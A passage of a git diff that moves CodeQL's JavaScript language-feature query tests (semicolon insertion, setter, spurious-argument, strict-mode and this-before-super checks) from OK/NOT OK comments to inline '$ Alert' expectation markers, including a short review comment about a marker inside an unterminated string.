b/javascript/ql/test/query-tests/LanguageFeatures/SemicolonInsertion/export.js 
@@ -2,7 +2,7 @@ export default function f() { return 23; } -export var x = 42 +export var x = 42 // $ Alert //pad with enough explicit semicolons to satisfy 90% threshold foo(); diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SemicolonInsertion/jscript.js b/javascript/ql/test/query-tests/LanguageFeatures/SemicolonInsertion/jscript.js index 5e9b07cf6757..6f125751c3a2 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SemicolonInsertion/jscript.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/SemicolonInsertion/jscript.js @@ -1,6 +1,6 @@ function window::onload() {} -window.onload = function onload() {} +window.onload = function onload() {} // $ Alert // pad with enough explicit semicolons to satisfy 90% threshold foo(); diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SemicolonInsertion/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/SemicolonInsertion/tst.js index 9b1d6f668923..3c296665f301 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SemicolonInsertion/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/SemicolonInsertion/tst.js @@ -1,22 +1,22 @@ function tst() { - var a = { // NOT OK + var a = { 'i': 1, 'j': 2 - } + } // $ Alert - return 1 // NOT OK + return 1 // $ Alert - if (condition) { // OK + if (condition) { } - for (i = 0; i < 10; i++) { // OK + for (i = 0; i < 10; i++) { } - label: while (condition) { // OK - break label; // OK + label: while (condition) { + break label; } - return 1; // OK + return 1; //pad with enough explicit semicolons to satisfy 90% threshold foo(); diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SetterIgnoresParameter/SetterIgnoresParameter.expected b/javascript/ql/test/query-tests/LanguageFeatures/SetterIgnoresParameter/SetterIgnoresParameter.expected index bf01936dd730..e49869816edf 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SetterIgnoresParameter/SetterIgnoresParameter.expected 
+++ b/javascript/ql/test/query-tests/LanguageFeatures/SetterIgnoresParameter/SetterIgnoresParameter.expected @@ -1,2 +1,2 @@ -| tst.js:15:3:15:12 | set x(v ... OK\\n\\t\\t} | This setter function does not use its parameter $@. | tst.js:15:9:15:9 | v | v | -| tst.js:40:3:40:25 | set y(_ ... _x\|0; } | This setter function does not use its parameter $@. | tst.js:40:9:40:10 | _y | _y | +| tst.js:15:3:15:23 | set x(v ... ert\\n\\t\\t} | This setter function does not use its parameter $@. | tst.js:15:9:15:9 | v | v | +| tst.js:38:3:38:25 | set y(_ ... _x\|0; } | This setter function does not use its parameter $@. | tst.js:38:9:38:10 | _y | _y | diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SetterIgnoresParameter/SetterIgnoresParameter.qlref b/javascript/ql/test/query-tests/LanguageFeatures/SetterIgnoresParameter/SetterIgnoresParameter.qlref index c5e101163a52..f090c96c40ce 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SetterIgnoresParameter/SetterIgnoresParameter.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/SetterIgnoresParameter/SetterIgnoresParameter.qlref @@ -1 +1,2 @@ -LanguageFeatures/SetterIgnoresParameter.ql \ No newline at end of file +query: LanguageFeatures/SetterIgnoresParameter.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SetterIgnoresParameter/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/SetterIgnoresParameter/tst.js index 22439c1e4f91..58682204ca5f 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SetterIgnoresParameter/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/SetterIgnoresParameter/tst.js @@ -5,27 +5,26 @@ function A() { return _a; }, set a(v) { - // OK + _a = v|0 }, get x() { return _x; }, - set x(v) { - // NOT OK + set x(v) { // $ Alert }, get y() { return 56; }, set y(v) { - // OK + throw new Error("Cannot mutate y."); }, set z(v) { - // OK + _z = arguments[0] | 0; } }; 
@@ -36,7 +35,6 @@ function Point(x, y) { get x() { return x; }, set x(_x) { x = _x|0; }, get y() { return y; }, - // NOT OK - set y(_y) { x = _x|0; } + set y(_y) { x = _x|0; } // $ Alert }; } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SetterReturn/SetterReturn.expected b/javascript/ql/test/query-tests/LanguageFeatures/SetterReturn/SetterReturn.expected index a5e92e24b4bd..2b911b330b6c 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SetterReturn/SetterReturn.expected +++ b/javascript/ql/test/query-tests/LanguageFeatures/SetterReturn/SetterReturn.expected @@ -1 +1 @@ -| tst.js:15:3:15:16 | return "nope"; | Useless return statement in setter function. | +| tst.js:14:3:14:16 | return "nope"; | Useless return statement in setter function. | diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SetterReturn/SetterReturn.qlref b/javascript/ql/test/query-tests/LanguageFeatures/SetterReturn/SetterReturn.qlref index 93a02072150c..0c6e38131cc4 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SetterReturn/SetterReturn.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/SetterReturn/SetterReturn.qlref @@ -1 +1,2 @@ -LanguageFeatures/SetterReturn.ql \ No newline at end of file +query: LanguageFeatures/SetterReturn.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SetterReturn/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/SetterReturn/tst.js index 4211400e6c48..5c7ea043cbe2 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SetterReturn/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/SetterReturn/tst.js @@ -1,17 +1,16 @@ var o = { _secret_x: 42, get x() { - // OK + return 42; }, set x(v) { if (v !== 42) - // OK + return; _secret_x = v; }, set y(w) { - // NOT OK - return "nope"; + return "nope"; // $ Alert } } \ No newline at end of file 
diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/SpuriousArguments.expected b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/SpuriousArguments.expected
index 92b3fc978773..b88dd7d68e80 100644
--- a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/SpuriousArguments.expected
+++ b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/SpuriousArguments.expected
@@ -8,17 +8,17 @@ | reflection.js:7:15:7:18 | 1 | Superfluous arguments passed to $@. | reflection.js:1:1:1:23 | functio ... eturn;} | function f0 | | reflection.js:12:18:12:18 | 2 | Superfluous argument passed to $@. | reflection.js:2:1:2:24 | functio ... eturn;} | function f1 | | thisparameter.ts:4:11:4:12 | 45 | Superfluous argument passed to $@. | thisparameter.ts:1:1:1:45 | functio ... eturn;} | function foo | -| tst.js:11:3:11:5 | g() | Superfluous argument passed to $@. | tst.js:1:1:4:1 | functio ... x+19;\\n} | function f | -| tst.js:33:15:33:18 | 2 | Superfluous arguments passed to $@. | externs.js:34:1:34:27 | functio ... str) {} | function String | -| tst.js:37:4:37:5 | 42 | Superfluous argument passed to $@. | tst.js:38:4:38:23 | function() {return;} | anonymous function | -| tst.js:46:19:46:20 | 10 | Superfluous argument passed to $@. | externs.js:36:1:36:27 | functio ... num) {} | function parseFloat | -| tst.js:70:11:70:12 | 42 | Superfluous argument passed to $@. | tst.js:49:2:51:2 | functio ... urn;\\n\\t} | function nonEmpty | -| tst.js:75:13:75:14 | 42 | Superfluous argument passed to $@. | tst.js:63:19:63:33 | () => undefined | function emptyArrow | -| tst.js:76:31:76:32 | 42 | Superfluous argument passed to $@. | tst.js:64:33:64:32 | () {} | default constructor of class ImplicitEmptyConstructor | -| tst.js:77:31:77:32 | 42 | Superfluous argument passed to $@. | tst.js:67:14:68:3 | (){\\n\\t\\t} | constructor of class ExplicitEmptyConstructor | -| tst.js:78:20:78:21 | 10 | Superfluous argument passed to $@. | externs.js:36:1:36:27 | functio ... num) {} | function parseFloat | -| tst.js:114:20:114:21 | 42 | Superfluous argument passed to $@. | tst.js:82:2:86:2 | functio ... \\n\\t\\t}\\n\\t} | function notAPlainThrower1 | -| tst.js:115:20:115:21 | 42 | Superfluous argument passed to $@. | tst.js:87:2:90:2 | functio ... .");\\n\\t} | function notAPlainThrower2 | -| tst.js:116:20:116:21 | 42 | Superfluous argument passed to $@. 
| tst.js:91:2:94:2 | functio ... .");\\n\\t} | function notAPlainThrower3 | -| tst.js:120:23:120:24 | 87 | Superfluous argument passed to $@. | tst.js:102:2:104:2 | functio ... (p);\\n\\t} | function throwerWithParam | -| tst.js:121:18:121:19 | 42 | Superfluous argument passed to $@. | tst.js:105:2:113:2 | functio ... )();\\n\\t} | function throwerIndirect | +| tst.js:10:3:10:5 | g() | Superfluous argument passed to $@. | tst.js:1:1:4:1 | functio ... x+19;\\n} | function f | +| tst.js:31:15:31:18 | 2 | Superfluous arguments passed to $@. | externs.js:34:1:34:27 | functio ... str) {} | function String | +| tst.js:34:4:34:5 | 42 | Superfluous argument passed to $@. | tst.js:35:4:35:23 | function() {return;} | anonymous function | +| tst.js:43:19:43:20 | 10 | Superfluous argument passed to $@. | externs.js:36:1:36:27 | functio ... num) {} | function parseFloat | +| tst.js:67:11:67:12 | 42 | Superfluous argument passed to $@. | tst.js:46:2:48:2 | functio ... urn;\\n\\t} | function nonEmpty | +| tst.js:72:13:72:14 | 42 | Superfluous argument passed to $@. | tst.js:60:19:60:33 | () => undefined | function emptyArrow | +| tst.js:73:31:73:32 | 42 | Superfluous argument passed to $@. | tst.js:61:33:61:32 | () {} | default constructor of class ImplicitEmptyConstructor | +| tst.js:74:31:74:32 | 42 | Superfluous argument passed to $@. | tst.js:64:14:65:3 | (){\\n\\t\\t} | constructor of class ExplicitEmptyConstructor | +| tst.js:75:20:75:21 | 10 | Superfluous argument passed to $@. | externs.js:36:1:36:27 | functio ... num) {} | function parseFloat | +| tst.js:111:20:111:21 | 42 | Superfluous argument passed to $@. | tst.js:79:2:83:2 | functio ... \\n\\t\\t}\\n\\t} | function notAPlainThrower1 | +| tst.js:112:20:112:21 | 42 | Superfluous argument passed to $@. | tst.js:84:2:87:2 | functio ... .");\\n\\t} | function notAPlainThrower2 | +| tst.js:113:20:113:21 | 42 | Superfluous argument passed to $@. | tst.js:88:2:91:2 | functio ... 
.");\\n\\t} | function notAPlainThrower3 | +| tst.js:117:23:117:24 | 87 | Superfluous argument passed to $@. | tst.js:99:2:101:2 | functio ... (p);\\n\\t} | function throwerWithParam | +| tst.js:118:18:118:19 | 42 | Superfluous argument passed to $@. | tst.js:102:2:110:2 | functio ... )();\\n\\t} | function throwerIndirect | diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/SpuriousArguments.qlref b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/SpuriousArguments.qlref index f148cdba2ece..2c48d9faefb0 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/SpuriousArguments.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/SpuriousArguments.qlref @@ -1 +1,2 @@ -LanguageFeatures/SpuriousArguments.ql \ No newline at end of file +query: LanguageFeatures/SpuriousArguments.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/es2015.js b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/es2015.js index 928edcd7fd3e..07f4446800b0 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/es2015.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/es2015.js @@ -1,7 +1,7 @@ class Class1 { constructor(x) { this.x = x; } } -new Class1(42, 23); // NOT OK: `23` is ignored +new Class1(42, 23); // $ Alert - `23` is ignored class Sup { constructor(x) { this.x = x; } @@ -10,12 +10,12 @@ class Sup { class Sub extends Sup { } -new Sub(42); // OK: synthetic constructor delegates to super constructor +new Sub(42); // OK - synthetic constructor delegates to super constructor class Other {} -new Other(42); // NOT OK: `42` is ignored +new Other(42); // $ Alert - `42` is ignored var args = []; -f(...args); // OK -f(42, ...args); // NOT OK \ No newline at end of file +f(...args); +f(42, ...args); // $ Alert \ No newline at end of file 
diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/globals.js b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/globals.js index 3771a18ed876..e41ddd2d0136 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/globals.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/globals.js @@ -4,7 +4,7 @@ function global() {return;} window.global = function (x) {return;}; })(this); -global(x); // OK: might refer to function on line 4 +global(x); // OK - might refer to function on line 4 function otherglobal() {return;} @@ -12,6 +12,6 @@ var o = { otherglobal: function (x) {return;} }; -otherglobal(x); // NOT OK: can never refer to function on line 12 -otherglobal.call(null, x); // NOT OK -otherglobal.call(null, x, y); // NOT OK +otherglobal(x); // $ Alert - can never refer to function on line 12 +otherglobal.call(null, x); // $ Alert +otherglobal.call(null, x, y); // $ Alert diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/reflection.js b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/reflection.js index 22c8c3b537e7..ac2df0dafdce 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/reflection.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/reflection.js @@ -3,13 +3,13 @@ function f1(x) {return;} f0.call(); f0.call(this); -f0.call(this, 1); -f0.call(this, 1, 2); +f0.call(this, 1); // $ Alert +f0.call(this, 1, 2); // $ Alert f1.call(); f1.call(this); f1.call(this, 1); -f1.call(this, 1, 2); +f1.call(this, 1, 2); // $ Alert f0.apply(); f0.apply(this); diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/thisparameter.ts b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/thisparameter.ts index d166c957858e..d17b5d33459f 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/thisparameter.ts 
+++ b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/thisparameter.ts @@ -1,4 +1,4 @@ function foo(this: void, x: number) {return;} -foo(45); // OK -foo(null, 45); // NOT OK +foo(45); +foo(null, 45); // $ Alert diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/tst.js index 1caa88564a1a..387348232e3d 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/tst.js @@ -7,8 +7,7 @@ function g() { return 23; } -// NOT OK -f(g()); +f(g()); // $ Alert function sum() { var result = 0; @@ -17,33 +16,31 @@ function sum() { return result; } -// OK + sum(1, 2, 3); function h(k) { k = k || function() {}; - // OK + k(42); } -// OK + new Array(1, 2, 3); -// NOT OK -new String(1, 2, 3); +new String(1, 2, 3); // $ Alert (function(f) { - // NOT OK - f(42); + f(42); // $ Alert })(function() {return;}); (function h(f) { - // OK + f(42); h(function(x) { return x; }); })(function() {}); -parseFloat("123", 10); +parseFloat("123", 10); // $ Alert - unlike parseInt this does not take a radix (function testWhitelistEmptyFunctions(){ function nonEmpty(){ @@ -67,15 +64,15 @@ parseFloat("123", 10); constructor(){ } } - nonEmpty(42); // NOT OK - empty(42); // OK - emptyWithParam(42, 87); // OK - commentedEmpty(42); // OK - commentedEmptyWithSpreadParam(42, 87); // OK - emptyArrow(42); // NOT OK - new ImplicitEmptyConstructor(42); // NOT OK - new ExplicitEmptyConstructor(42); // NOT OK - parseFloat("123", 10); // NOT OK + nonEmpty(42); // $ Alert + empty(42); + emptyWithParam(42, 87); + commentedEmpty(42); + commentedEmptyWithSpreadParam(42, 87); + emptyArrow(42); // $ Alert + new ImplicitEmptyConstructor(42); // $ Alert + new ExplicitEmptyConstructor(42); // $ Alert + parseFloat("123", 10); // $ Alert }); (function testWhitelistThrowingFunctions() { 
@@ -111,14 +108,14 @@ parseFloat("123", 10); } })(); } - notAPlainThrower1(42); // NOT OK - notAPlainThrower2(42); // NOT OK - notAPlainThrower3(42); // NOT OK - thrower(42); // OK - throwerArrow(42); // OK - throwerCustom(42); // OK - throwerWithParam(42, 87); // NOT OK - throwerIndirect(42); // OK, but still flagged due to complexity + notAPlainThrower1(42); // $ Alert + notAPlainThrower2(42); // $ Alert + notAPlainThrower3(42); // $ Alert + thrower(42); + throwerArrow(42); + throwerCustom(42); + throwerWithParam(42, 87); // $ Alert + throwerIndirect(42); // $ SPURIOUS: Alert - flagged due to complexity }); function sum2() { @@ -128,14 +125,14 @@ function sum2() { return result; } -// OK + sum2(1, 2, 3); const $ = function (x, arr) { console.log(x, arr); }; -// OK + async function tagThing(repoUrl, directory) { await $`git clone ${repoUrl} ${directory}`; } diff --git a/javascript/ql/test/query-tests/LanguageFeatures/StrictModeCallStackIntrospection/StrictModeCallStackIntrospection.expected b/javascript/ql/test/query-tests/LanguageFeatures/StrictModeCallStackIntrospection/StrictModeCallStackIntrospection.expected index 967ac1ce58f3..7141c9d5589e 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/StrictModeCallStackIntrospection/StrictModeCallStackIntrospection.expected +++ b/javascript/ql/test/query-tests/LanguageFeatures/StrictModeCallStackIntrospection/StrictModeCallStackIntrospection.expected 
@@ -1,7 +1,7 @@ -| tst.js:5:30:5:45 | arguments.callee | Strict mode code cannot use arguments.callee. | -| tst.js:7:21:7:36 | arguments.callee | Strict mode code cannot use arguments.callee. | -| tst.js:9:20:9:27 | f.caller | Strict mode code cannot use Function.prototype.caller. | -| tst.js:11:17:11:27 | f.arguments | Strict mode code cannot use Function.prototype.arguments. | -| tst.js:18:10:18:25 | arguments.callee | Strict mode code cannot use arguments.callee. | -| tst.js:31:12:31:21 | foo.caller | Strict mode code cannot use Function.prototype.caller. | -| tst.js:31:12:31:21 | foo.caller | Strict mode code cannot use arguments.caller. | +| tst.js:4:30:4:45 | arguments.callee | Strict mode code cannot use arguments.callee. | +| tst.js:5:21:5:36 | arguments.callee | Strict mode code cannot use arguments.callee. | +| tst.js:6:20:6:27 | f.caller | Strict mode code cannot use Function.prototype.caller. | +| tst.js:7:17:7:27 | f.arguments | Strict mode code cannot use Function.prototype.arguments. | +| tst.js:13:10:13:25 | arguments.callee | Strict mode code cannot use arguments.callee. | +| tst.js:25:12:25:21 | foo.caller | Strict mode code cannot use Function.prototype.caller. | +| tst.js:25:12:25:21 | foo.caller | Strict mode code cannot use arguments.caller. | diff --git a/javascript/ql/test/query-tests/LanguageFeatures/StrictModeCallStackIntrospection/StrictModeCallStackIntrospection.qlref b/javascript/ql/test/query-tests/LanguageFeatures/StrictModeCallStackIntrospection/StrictModeCallStackIntrospection.qlref index d093603e0779..92a121e2099c 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/StrictModeCallStackIntrospection/StrictModeCallStackIntrospection.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/StrictModeCallStackIntrospection/StrictModeCallStackIntrospection.qlref 
@@ -1 +1,2 @@ -LanguageFeatures/StrictModeCallStackIntrospection.ql \ No newline at end of file +query: LanguageFeatures/StrictModeCallStackIntrospection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/LanguageFeatures/StrictModeCallStackIntrospection/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/StrictModeCallStackIntrospection/tst.js index 583daac6ccca..6965cab8bae0 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/StrictModeCallStackIntrospection/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/StrictModeCallStackIntrospection/tst.js @@ -1,25 +1,20 @@ var o = { A: function f(x) { 'use strict'; - // BAD - if (!(this instanceof arguments.callee)) - // BAD - return new arguments.callee(x); - // BAD - console.log(f.caller); - // BAD - this.y = f.arguments; + if (!(this instanceof arguments.callee)) // $ Alert + return new arguments.callee(x); // $ Alert + console.log(f.caller); // $ Alert + this.y = f.arguments; // $ Alert this.x = x; } }; var D = class extends function() { - // BAD - return arguments.callee; + return arguments.callee; // $ Alert } {}; function g() { - // OK + return arguments.caller.length; } @@ -27,8 +22,7 @@ function g() { 'use strict'; function h() { var foo = Math.random() > 0.5 ? h : arguments; - // BAD - return foo.caller; + return foo.caller; // $ Alert } })(); diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SyntaxError/SyntaxError.qlref b/javascript/ql/test/query-tests/LanguageFeatures/SyntaxError/SyntaxError.qlref index 33bc1d9e3b45..4133f6e98314 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SyntaxError/SyntaxError.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/SyntaxError/SyntaxError.qlref @@ -1 +1 @@ -LanguageFeatures/SyntaxError.ql +query: LanguageFeatures/SyntaxError.ql 
diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SyntaxError/arrows.js b/javascript/ql/test/query-tests/LanguageFeatures/SyntaxError/arrows.js index 62468802e464..ce50894cacea 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SyntaxError/arrows.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/SyntaxError/arrows.js @@ -1 +1 @@ -(a, a) => a + a; +(a, a) => a + a; // $ Alert diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SyntaxError/destructingPrivate.js b/javascript/ql/test/query-tests/LanguageFeatures/SyntaxError/destructingPrivate.js index 060111d86b46..4edd6cb2d6f9 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SyntaxError/destructingPrivate.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/SyntaxError/destructingPrivate.js @@ -1,6 +1,6 @@ class C { #privDecl; bar() { - {#privDecl} = this; + {#privDecl} = this; // $ Alert } } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SyntaxError/tst.js b/javascript/ql/test/query-tests/LanguageFeatures/SyntaxError/tst.js index e7aaa89f128a..62acf99f0477 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/SyntaxError/tst.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/SyntaxError/tst.js @@ -1,2 +1,2 @@ function findBox() { - return $("box.important + return $("box.important // $ Alert diff --git a/javascript/ql/test/query-tests/LanguageFeatures/TemplateSyntaxInStringLiteral/TemplateSyntaxInStringLiteral.js b/javascript/ql/test/query-tests/LanguageFeatures/TemplateSyntaxInStringLiteral/TemplateSyntaxInStringLiteral.js index 65a61da7a616..d21a662dc5e8 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/TemplateSyntaxInStringLiteral/TemplateSyntaxInStringLiteral.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/TemplateSyntaxInStringLiteral/TemplateSyntaxInStringLiteral.js 
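Review bot: The `// $ Alert` marker added after `return $("box.important` in SyntaxError/tst.js follows an unterminated string literal, so it is presumably read as part of the string rather than as a comment. The SyntaxError.qlref hunk also adds only `query: LanguageFeatures/SyntaxError.ql`, with no `postprocess:` line like the other directories get. As far as this diff shows, the markers in arrows.js, destructingPrivate.js and tst.js are therefore documentation only and are not checked against the query results. I would say so on one of them, for example in arrows.js: `(a, a) => a + a; // $ Alert - informational; SyntaxError.qlref has no InlineExpectations postprocess`, so nobody assumes a misplaced marker here would be caught.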
@@ -2,7 +2,7 @@ function connectAndLog(id) { log.info(`Connecting to ${id}`) let connection = openConnection(id) if (!connection) { - log.error('Could not connect to ${id}') + log.error('Could not connect to ${id}') // $ Alert } } @@ -14,9 +14,9 @@ function emitTemplate(name, date) { var globalVar = "global"; function foo() { - log.error('globalVar = ${globalVar}'); + log.error('globalVar = ${globalVar}'); // $ Alert } -log.error('globalVar = ${globalVar}'); +log.error('globalVar = ${globalVar}'); // $ Alert function bar() { log.error('Something ${notInScope}'); @@ -25,7 +25,7 @@ function bar() { function baz(x){ log.error("${x}"); log.error("${y}"); - log.error("${x} "); + log.error("${x} "); // $ Alert log.error("${y} "); } @@ -37,7 +37,7 @@ function foo1() { const foobar = 4; const data = {name: name, date: date}; - writer.emit("Name: ${name}, Date: ${date}.", data); // OK + writer.emit("Name: ${name}, Date: ${date}.", data); - writer.emit("Name: ${name}, Date: ${date}, ${foobar}", data); // NOT OK - `foobar` is not in `data`. + writer.emit("Name: ${name}, Date: ${date}, ${foobar}", data); // $ Alert - `foobar` is not in `data`. } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/LanguageFeatures/TemplateSyntaxInStringLiteral/TemplateSyntaxInStringLiteral.qlref b/javascript/ql/test/query-tests/LanguageFeatures/TemplateSyntaxInStringLiteral/TemplateSyntaxInStringLiteral.qlref index 372cdfd68f5d..6eb187fa573a 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/TemplateSyntaxInStringLiteral/TemplateSyntaxInStringLiteral.qlref +++ b/javascript/ql/test/query-tests/LanguageFeatures/TemplateSyntaxInStringLiteral/TemplateSyntaxInStringLiteral.qlref @@ -1 +1,2 @@ -LanguageFeatures/TemplateSyntaxInStringLiteral.ql +query: LanguageFeatures/TemplateSyntaxInStringLiteral.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/javascript/ql/test/query-tests/LanguageFeatures/ThisBeforeSuper/ThisBeforeSuper.expected b/javascript/ql/test/query-tests/LanguageFeatures/ThisBeforeSuper/ThisBeforeSuper.expected
index e4a1e1a53dff..dbc274d613c1 100644
--- a/javascript/ql/test/query-tests/LanguageFeatures/ThisBeforeSuper/ThisBeforeSuper.expected
+++ b/javascript/ql/test/query-tests/LanguageFeatures/ThisBeforeSuper/ThisBeforeSuper.expected
@@ -10,5 +10,5 @@
 | invalid.js:14:35:14:118 | () { cl ... er(); } | The super constructor must be called before using $@. | invalid.js:14:99:14:102 | this | this |
 | invalid.js:15:71:15:95 | () { th ... er(); } | The super constructor must be called before using $@. | invalid.js:15:76:15:79 | this | this |
 | invalid.js:16:35:16:66 | () { if ... .a(); } | The super constructor must be called before using $@. | invalid.js:16:56:16:59 | this | this |
-| invalid.js:26:16:26:19 | () {\\n ... ;\\n } | The super constructor must be called before using $@. | invalid.js:27:9:27:12 | this | this |
-| invalid.js:26:16:26:19 | () {\\n ... ;\\n } | The super constructor must be called before using $@. | invalid.js:28:9:28:12 | this | this |
+| invalid.js:26:16:26:30 | () { // ... ;\\n } | The super constructor must be called before using $@. | invalid.js:27:9:27:12 | this | this |
+| invalid.js:26:16:26:30 | () { // ... ;\\n } | The super constructor must be called before using $@. | invalid.js:28:9:28:12 | this | this |
diff --git a/javascript/ql/test/query-tests/LanguageFeatures/ThisBeforeSuper/ThisBeforeSuper.qlref b/javascript/ql/test/query-tests/LanguageFeatures/ThisBeforeSuper/ThisBeforeSuper.qlref
index f755c5a9d472..0d3e717fe79a 100644
--- a/javascript/ql/test/query-tests/LanguageFeatures/ThisBeforeSuper/ThisBeforeSuper.qlref
+++ b/javascript/ql/test/query-tests/LanguageFeatures/ThisBeforeSuper/ThisBeforeSuper.qlref
@@ -1 +1,2 @@ -LanguageFeatures/ThisBeforeSuper.ql \ No newline at end of file +query: LanguageFeatures/ThisBeforeSuper.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/LanguageFeatures/ThisBeforeSuper/invalid.js b/javascript/ql/test/query-tests/LanguageFeatures/ThisBeforeSuper/invalid.js index 82e7f8cda77e..c70e2cdcf7f1 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/ThisBeforeSuper/invalid.js +++ b/javascript/ql/test/query-tests/LanguageFeatures/ThisBeforeSuper/invalid.js 
@@ -2,18 +2,18 @@ // under the MIT license; see file LICENSE. class B1 {} -class A30 extends B1 { constructor() { this.c = 0; } } -class A31 extends B1 { constructor() { this.c(); } } -class A32 extends B1 { constructor() { super.c(); } } -class A33 extends B1 { constructor() { this.c = 0; super(); } } -class A34 extends B1 { constructor() { this.c(); super(); } } -class A35 extends B1 { constructor() { super.c(); super(); } } -class A36 extends B1 { constructor() { super(this.c); } } -class A37 extends B1 { constructor() { super(this.c()); } } -class A38 extends B1 { constructor() { super(super.c()); } } -class A39 extends B1 { constructor() { class C extends D { constructor() { super(); this.e(); } } this.f(); super(); } } -class A40 extends B1 { constructor() { class C extends D { constructor() { this.e(); super(); } } super(); this.f(); } } -class A41 extends B1 { constructor() { if (a) super(); this.a(); } } +class A30 extends B1 { constructor() { this.c = 0; } } // $ Alert +class A31 extends B1 { constructor() { this.c(); } } // $ Alert +class A32 extends B1 { constructor() { super.c(); } } // $ Alert +class A33 extends B1 { constructor() { this.c = 0; super(); } } // $ Alert +class A34 extends B1 { constructor() { this.c(); super(); } } // $ Alert +class A35 extends B1 { constructor() { super.c(); super(); } } // $ Alert +class A36 extends B1 { constructor() { super(this.c); } } // $ Alert +class A37 extends B1 { constructor() { super(this.c()); } } // $ Alert +class A38 extends B1 { constructor() { super(super.c()); } } // $ Alert +class A39 extends B1 { constructor() { class C extends D { constructor() { super(); this.e(); } } this.f(); super(); } } // $ Alert +class A40 extends B1 { constructor() { class C extends D { constructor() { this.e(); super(); } } super(); this.f(); } } // $ Alert +class A41 extends B1 { constructor() { if (a) super(); this.a(); } } // $ Alert // the following two cases are not currently detected (even though they should be): // 
